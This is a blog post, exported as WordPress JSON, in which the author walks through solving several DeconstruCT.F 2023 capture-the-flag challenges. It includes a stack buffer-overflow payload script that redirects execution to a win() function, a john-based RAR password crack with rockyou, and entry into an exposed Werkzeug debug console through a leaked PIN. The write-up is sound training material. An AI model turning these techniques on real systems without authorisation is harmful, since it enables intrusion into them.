{"id":707,"date":"2023-08-04T22:50:35","date_gmt":"2023-08-04T20:50:35","guid":{"rendered":"https:\/\/babdcatha.net\/?p=707"},"modified":"2024-03-02T18:11:38","modified_gmt":"2024-03-02T17:11:38","slug":"deconstruct-f-2023","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2023\/08\/04\/deconstruct-f-2023\/","title":{"rendered":"DeconstruCT.F 2023"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hi all, I participated this year in the <a href=\"https:\/\/deconstru.ctf.eng.run\">DeconstruCT.F<\/a> event, and I thought I would share my results with you.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Summary<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#GBP\">Avail Your Good Boy Points<\/a><\/li>\n\n\n\n<li><a href=\"#HashRoll\">Hash Roll<\/a><\/li>\n\n\n\n<li><a href=\"#Gibberish\">Gibberish<\/a><\/li>\n\n\n\n<li><a href=\"#debugzero\">debugzero<\/a><\/li>\n\n\n\n<li><a href=\"#ezpz\">Easy Peasy<\/a> (unsolved)<\/li>\n\n\n\n<li><a href=\"#missing\">Missing<\/a><\/li>\n\n\n\n<li><a href=\"#space\">Space Ahoy<\/a><\/li>\n\n\n\n<li><a href=\"#nothing\">sweet-nothing<\/a><\/li>\n\n\n\n<li><a href=\"#conclusion\">Conclusion<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"GBP\">Avail Your Good Boy Points<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">When reading the rules all the way to the end, we find the first flag of this challenge :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"990\" height=\"598\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Goodboy_blur.png\" alt=\"\" class=\"wp-image-712\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Goodboy_blur.png 990w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Goodboy_blur-300x181.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Goodboy_blur-768x464.png 768w\" sizes=\"auto, (max-width: 990px) 100vw, 990px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And, that gives us our first 100 points of the game !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"HashRoll\">Hash Roll<\/h2>\n\n\n\n<p class=\"has-text-align-left wp-block-paragraph\">Here, we are given two files, a PDF and a ZIP file, with the following description : &#8220;Augustine&#8217;s friend took a important file of augustine and stashed it. He was able to grab all the files from his friend&#8217;s machine but he is worried that the files are encrypted. Help him get the file back&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The Zip file looks like it has one file in it, <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">flag.jpg<\/mark>, but it is protected by a password. When we open the PDF, this is what we get :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"1009\" height=\"706\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_pdf.png\" alt=\"\" class=\"wp-image-715\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_pdf.png 1009w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_pdf-300x210.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_pdf-768x537.png 768w\" sizes=\"auto, (max-width: 1009px) 100vw, 1009px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">It might be hard to see at first, but there is a very small line at the end of the file, when we read it, this is what is says : <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">29ebf2f279da44f69a35206885cd2dbc might be something you need<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Is this the password ? No, we need to look harder. This string kind of looks like a hash, don&#8217;t you think ? If we try to search for what it may be, we find :<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"579\" height=\"186\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_md5_blur.png\" alt=\"\" class=\"wp-image-717\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_md5_blur.png 579w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_md5_blur-300x96.png 300w\" sizes=\"auto, (max-width: 579px) 100vw, 579px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Indeed, it was the MD5 hash of the password we were looking for, we can now decrypt the archive, and get our flag :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"1000\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur.png\" alt=\"\" class=\"wp-image-718\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur.png 1000w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur-300x300.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur-150x150.png 150w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur-768x768.png 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here we go, another 50 points for us.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Gibberish\">Gibberish<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This flag was probably not solved the intended way, but it doesn&#8217;t matter too much. for this challenge, we get a file called flag.txt, with what looks like a really long base64 string in it :<\/p>\n\n\n\n<div class=\"wp-block-file aligncenter\"><a id=\"wp-block-file--media-b87f9d32-ae76-4276-b2fd-0d89556b98b9\" href=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/flag.txt\">flag<\/a><a href=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/flag.txt\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b87f9d32-ae76-4276-b2fd-0d89556b98b9\">Download<\/a><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">Decoding it, it looks like an ELF binary, based on the first few bytes. We could try to run it to see what it does, but we can take a look at the strings present in this binary first, that might save us time, if the flag is stored directly as a string. And, indeed, we find this in the binary :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">goodbye\ufffd\ufffd\ufffdmlh{REDACTED}\ufffdWrong pass<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This looks a lot like a flag, doesn&#8217;t it ? If we replace the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">mlh<\/mark> part by <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">dsc<\/mark>, and try this flag, it works ! And that&#8217;s 100 more points for us !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"debugzero\">debugzero<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">For this challenge, we are given a website, where the wrong version was deployed. Let&#8217;s take a look at the site :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"867\" height=\"110\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/website.png\" alt=\"\" class=\"wp-image-728\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/website.png 867w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/website-300x38.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/website-768x97.png 768w\" sizes=\"auto, (max-width: 867px) 100vw, 867px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Nothing too interesting here, let&#8217;s take a look at the source for the page :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"markup\" class=\"language-markup\">&lt;!DOCTYPE html&gt;\n&lt;html lang=\"en\"&gt;\n  &lt;head&gt;\n    &lt;meta charset=\"UTF-8\" \/&gt;\n    &lt;meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" \/&gt;\n    &lt;meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" \/&gt;\n    &lt;title&gt;Todo List&lt;\/title&gt;\n    &lt;!-- CSS only --&gt;\n    &lt;link\n      href=\"https:\/\/cdn.jsdelivr.net\/npm\/bootstrap@5.2.0-beta1\/dist\/css\/bootstrap.min.css\"\n      rel=\"stylesheet\"\n      integrity=\"sha384-0evHe\/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor\"\n      crossorigin=\"anonymous\"\n    \/&gt;\n    &lt;!-- JavaScript Bundle with Popper --&gt;\n    &lt;script\n      src=\"https:\/\/cdn.jsdelivr.net\/npm\/bootstrap@5.2.0-beta1\/dist\/js\/bootstrap.bundle.min.js\"\n      integrity=\"sha384-pprn3073KE6tl6bjs2QrFaJGz5\/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2\"\n      crossorigin=\"anonymous\"\n    &gt;&lt;\/script&gt;\n    &lt;link rel=\"stylesheet\" href=\"static\/styles.css\" \/&gt;\n  &lt;\/head&gt;\n  &lt;body&gt;\n    &lt;div class=\"container\"&gt;\n      &lt;h1&gt;This website is currently under &lt;i&gt;development&lt;\/i&gt;&lt;\/h1&gt;\n    &lt;\/div&gt;\n  &lt;\/body&gt;\n\n  &lt;!-- John, please don't run the app in debug mode, how many times do I have to tell you this! --&gt;\n&lt;\/html&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Apparently, John ran this app in debug mode, interesting. Searching a bit on the website, we find a Werkzeug console on <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">\/console<\/mark>, which means that this is a Flask server :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"343\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked-1024x343.png\" alt=\"\" class=\"wp-image-732\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked-1024x343.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked-300x101.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked-768x257.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked.png 1355w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Hmmm, looking for a bit, I couldn&#8217;t find a working way to bypass this authentication popup. Time to try somewhere else. Looking back at the code, we find another interesting file : <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">\/static\/styles.css<\/mark>, which contains this :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">\/* Nothing interesting here except this number - XXXXXX *\/<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Okay, we got the pin we were looking for. We now just have to open the debug console, read the flag, and that&#8217;s it :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"396\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur-1024x396.png\" alt=\"\" class=\"wp-image-735\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur-1024x396.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur-300x116.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur-768x297.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur.png 1143w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Good, 500 more points for us !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"ezpz\">Easy Peasy<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This challenge revolves around binary exploitation. We get a copy of the executable file, running on a server which also has a flag : <\/p>\n\n\n\n<p class=\"has-text-align-left wp-block-paragraph\">Running the app, it asks for a password which we do not have (and, in fact, does not exist). Looking for strings did not give us anything useful, so we take a look at the code using Ghidra :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"c\" class=\"language-c\">undefined8 main(void)\n\n{\n  puts(\"Please enter the super secret password to display the flag:\");\n  vuln();\n  puts(\"Invalid password, try again\\n\");\n  return 0;\n}\n\nvoid vuln(void)\n\n{\n  char pasword_input [32];\n  \n  gets(pasword_input);\n  return;\n}\n\nvoid win(void)\n\n{\n  char local_58 [72];\n  FILE *flag_file_pointer;\n  \n  flag_file_pointer = fopen(\"flag.txt\",\"r\");\n  if (flag_file_pointer == (FILE *)0x0) {\n    printf(\"%s %s\",\"Please create \\'flag.txt\\' in this directory with your\",\"own debugging flag.\\n\")\n    ;\n                    \/* WARNING: Subroutine does not return *\/\n    exit(0);\n  }\n  fgets(local_58,0x40,flag_file_pointer);\n  printf(local_58);\n  return;\n}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Okay, basically, the main() function calls a function named <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">vuln()<\/mark>, in which the user inputs his password. The function then returns and the program ends there, no matter what the supplied password is. How are we supposed to get to the flag then ? Well, there is also a win function, which reads the flag and prints it. If we could execute this function, we could receive the flag, but how can we call this function ?<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The vuln() function stores the password in a char array of length 32, and does not perform any verification on the user input, this means that we can probably try a buffer overflow here !<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Let&#8217;s run the program in <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">gdb<\/mark>, and see if this works. To create the exploit input, I used this small python script :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">padding = 'A'*32\nrbp = \"ABCDEFGH\"\nrip = \"4321\"\n\nprint(padding + rbp + rip)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">When we run the program and input this password, it crashes, looking at the registers, we get this :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"750\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_init.png\" alt=\"\" class=\"wp-image-742\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_init.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_init-300x234.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_init-768x600.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">See the rip register, which controls the next instruction the CPU will execute ? It contains the hex values for the string 4321, reversed because of endianness. This means we can control where the program will go after the vuln() function ! All we have to do is find the address of the win() function using gdb, and input it into our script. This is the gdb command to do this :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">info address win<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, when we try it :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"337\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_win_blur.png\" alt=\"\" class=\"wp-image-744\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_win_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_win_blur-300x105.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_win_blur-768x270.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay, it works ! Let&#8217;s try it on the real server :<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Well, unfortunately, by that time, the binary running on the server had been changed, and I wasn&#8217;t aware of this \ud83d\ude05. Oh, well, at least it worked on my machine \ud83d\ude42.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"missing\">Missing<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We are given a .rar file, and we can crack it open using john :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">rar2john jason.rar &gt; jason.txt\njohn --wordlist=\/usr\/share\/wordlists\/rockyou.txt jason.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This gives us the password, now, let&#8217;s take a look inside, we find two github repositories.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We can see a few traps, but one thing looks promising in the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">empty.txt<\/mark> file :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">find my github pages site that i accidentaly deleted to find what u want :P<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Since this is a Git repository, we can look back in time to see what it was :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">aHR0cHM6Ly93d3cuaW5zdGFncmFtLmNvbS90b2RkX2phc29uX3NlY3VyZS8=<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Which, decoded, is :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">https:\/\/www.instagram.com\/todd_jason_secure\/<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">After creating an Instagram account ( :'( ), we find this :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-10\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"749\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram-1024x749.png\" alt=\"\" class=\"wp-image-753\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram-1024x749.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram-300x219.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram-768x562.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram.png 1270w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We need to find his twitter account for the next step, and a weird string. After creating a Twitter account ( :'( ), we find him :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">https:\/\/twitter.com\/toddjasonsecure<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And a bunch of base64 \/ base32 encoded strings :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">ZHNje24wX0YhQEdfSGVSZV86cF9tQDdFfQ==\nG5UF6TZVJFH(REDACTED)==<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The first one translates to &#8220;<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">dsc{n0_F!@G_HeRe_:p_m@7E}<\/mark>&#8220;, so it&#8217;s probably not too important. The second part is in base32, and when decoded, gives us the last part of the real flag. We are progressing !<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Looking back at the Instagram account, we find the first part of the flag in the second image on the account :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-11\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"489\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-1024x489.png\" alt=\"\" class=\"wp-image-760\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-1024x489.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-300x143.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-768x367.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-1536x734.png 1536w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag.png 1553w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And with that, we have this flag ! Hurray ! We even have the second blood on this one \ud83d\ude42<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"space\">Space Ahoy<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This is a challenge where we are given an image to work with. Using <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">binwalk<\/mark> on it gives us another image hidden inside the first :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">binwalk -Me file.jpg<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full wp-duotone-unset-12\"><img loading=\"lazy\" decoding=\"async\" width=\"612\" height=\"408\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/hidden-1.jpg\" alt=\"\" class=\"wp-image-764\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/hidden-1.jpg 612w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/hidden-1-300x200.jpg 300w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We can also find a peculiar string in the first image :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">the aliens are here try slowscan<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Using binwalk on the second image, we find a .wav file :<\/p>\n\n\n\n<div class=\"wp-block-file aligncenter\"><a id=\"wp-block-file--media-c0a40245-1327-449d-9352-9379cb165cee\" href=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/SupEr_s3CrET_AuD10.wav\">SupEr_s3CrET_AuD10<\/a><a href=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/SupEr_s3CrET_AuD10.wav\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c0a40245-1327-449d-9352-9379cb165cee\">Download<\/a><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">This time, binwalk doesn&#8217;t find anything in it. When looking at what slowscan is, I found out that it was a protocol used by radioamateurs to transmit images. Looking a bit more, I found the <a href=\"https:\/\/github.com\/colaclanth\/sstv\">SSTV<\/a> library on GitHub by <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">colaclanth<\/mark> which is able to transform SSTV .wav recordings to an image. Using it gave me this image :<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full wp-duotone-unset-13\"><img loading=\"lazy\" decoding=\"async\" width=\"320\" height=\"256\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/sstv_blur.png\" alt=\"\" class=\"wp-image-771\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/sstv_blur.png 320w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/sstv_blur-300x240.png 300w\" sizes=\"auto, (max-width: 320px) 100vw, 320px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Scanning the QR code gave me the flag ! One more down !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"nothing\">sweet-nothing<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">For this challenge, we come across this website, which apparently has the flag right in front of us :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-14\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"493\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-1024x493.png\" alt=\"\" class=\"wp-image-774\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-1024x493.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-300x144.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-768x370.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-1536x739.png 1536w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">A lot of things about Italy. Playing a bit with the request, we come across this header :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">Accept-Language=en-US,en;q=0.5<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">What if we change this to Italian ? This is what we get back :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">Almost there! Your secret query is \"spaghetti\".<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, if we add this (query=spaghetti) to our request before sending it :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">dsc{REDACTED}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, we hot our flag for this challenge !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"conclusion\">Conclusion<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This CTF had quite a lot of guess work, but I enjoyed it. Here are my final results :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-15\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"557\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-1024x557.png\" alt=\"\" class=\"wp-image-790\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-1024x557.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-300x163.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-768x418.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-1536x836.png 1536w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result.png 1588w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">I finished 67th out of 1506 contestants, with 7 challenges completed including one second blood. I&#8217;m quite happy with this result !<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi all, I participated this year in the DeconstruCT.F event, and I thought I would share my results with you. Summary Avail Your Good Boy Points When reading the rules all the way to the end, we find the first flag of this challenge : And, that gives us our first 100 points of the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[68,67,66],"class_list":["post-707","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-68","tag-ctf","tag-deconstruct-f"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/707","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=707"}],"version-history":[{"count":61,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/707\/revisions"}],"predecessor-version":[{"id":860,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/707\/revisions\/860"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=707"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=707"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=707"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}